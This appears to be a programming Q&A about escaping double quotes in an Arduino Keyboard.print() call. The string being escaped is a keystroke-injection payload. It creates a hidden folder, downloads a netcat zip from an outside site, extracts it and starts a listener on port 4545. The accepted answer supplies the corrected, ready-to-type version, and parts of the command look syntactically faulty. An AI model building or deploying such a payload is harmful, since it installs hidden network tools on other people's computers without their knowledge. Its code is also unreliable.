# Printing multiple double qoutes in print statement

Tags: c, keyboard

I'm trying to print multiple quotes in a `Keyboard.print()` function but when i try to escape the character with \ at  `$output =\"$HOME\Misc\nc.zip\""` and the string does not get recognized by the ide. Usually when the ide knows it's a string it highlights the text in blue, it does not do that for $output and after $output. How can I print the whole string including all the double quotes within the string?

```
Keyboard.print("\"cd $HOME\""; $folder=mkdir \"Misc\""; $folder; $url=\"https://test.org/cc.zip\""; $output =\"$HOME\Misc\nc.zip\""; (New-Object System.Net.WebClient).DownloadFile($url,$output); $shell=NewObject -ComObject shell.application; $zip=$shell.NameSpace(\"$HOME\Misc\nc.zip\") foreach ($item in $zip.items()) { $shell.NameSpace(\"$HOME\Misc\").CopyHere($item)}"):
```

Comment: What is your question? Your post looks like a bug report for Arduino IDE; if so, post it as an issue to https://github.com/arduino/Arduino/issues

Comment: How can I print the whole string including the quotes.  @jfpoilpret

Comment: What is the **exact** sequence of characters that you want to send to the keyboard? From that, we can show you how to properly escape it. As I see in your sample code, your escaping looks incorrect in several palces, in particular, almost everywhere you used `\""` where you should have used `\"` **only**.

Comment: I don't understand what you mean by sequence, I just want to print this string this is without any messy escaping quotes  `Keyboard.print("cd  "$HOME"; $folder=mkdir "Misc"; $folder; $folder.Attributes= "Hidden"; $url="https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip"; $output = "$HOME\Misc\nc.zip"; (New-Object System.Net.WebClient).DownloadFile($url,$output); $shell=NewObject -ComObject shell.application; $zip=$shell.NameSpace("$HOME\Misc\nc.zip") foreach ($item in $zip.items()) { $shell.NameSpace("$HOME\Misc").CopyHere($item)} ".\netcat-1.11\nc.exe" -lp 4545 > incoming.txt");`

Comment: but when I only use one double quote at the end it stops at $output the rest doest not  get recognized as a string.

Comment: [Don't cross post.](https://stackoverflow.com/questions/41177490/what-is-the-string-limit-with-the-arduino-ide)

Answer (score 1, accepted):

It seems you used `\""` instead of **only** `\"` in several locations of this string. Also, since the string you want to send already includes the escape `\` character, it must iself be escaped `\\`.

If the command you want to send to keyboard is:

> cd "$HOME"; $folder=mkdir "Misc"; $folder; $folder.Attributes= "Hidden"; $url="https://eternallybored.org/misc/netcat/netcat-win32-1.‌​11.zip"; $output = "$HOME\Misc\nc.zip"; (New-Object System.Net.WebClient).DownloadFile($url,$output); $shell=NewObject -ComObject shell.application; $zip=$shell.NameSpace("$HOME\Misc\nc.zip") foreach ($item in $zip.items()) { $shell.NameSpace("$HOME\Misc").CopyHere($item)} ".\netcat-1.11\nc.exe" -lp 4545 > incoming.txt

Then you should escape it as follows:

```
"cd \"$HOME\"; $folder=mkdir \"Misc\"; $folder; $folder.Attributes= \"Hidden\"; $url=\"https://eternallybored.org/misc/netcat/netcat-win32-1.‌​11.zip\"; $output = \"$HOME\\Misc\\nc.zip\"; (New-Object System.Net.WebClient).DownloadFile($url,$output); $shell=NewObject -ComObject shell.application; $zip=$shell.NameSpace(\"$HOME\\Misc\\nc.zip\") foreach ($item in $zip.items()) { $shell.NameSpace(\"$HOME\\Misc\").CopyHere($item)} \".\\netcat-1.11\\nc.exe\" -lp 4545 > incoming.txt"
```